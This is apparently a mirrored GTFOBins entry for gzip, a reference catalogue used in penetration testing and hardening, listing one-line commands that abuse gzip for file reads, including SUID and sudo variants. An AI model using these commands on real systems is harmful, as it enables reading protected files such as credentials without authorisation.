mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
af562d63cb
As suggested in #176 by Kiran Ghimire (Cimihan123).
17 lines
478 B
Markdown
17 lines
478 B
Markdown
---
|
|
description: There are also a number of other utilities that rely on `gzip` under the hood, e.g., `zless`, `zcat`, `gunzip`, etc. Besides having similar features, they also allow privileged reads if `gzip` itself is SUID.
|
|
functions:
|
|
file-read:
|
|
- code: |
|
|
LFILE=file_to_read
|
|
gzip -f $LFILE -t
|
|
suid:
|
|
- code: |
|
|
LFILE=file_to_read
|
|
./gzip -f $LFILE -t
|
|
sudo:
|
|
- code: |
|
|
LFILE=file_to_read
|
|
sudo gzip -f $LFILE -t
|
|
---
|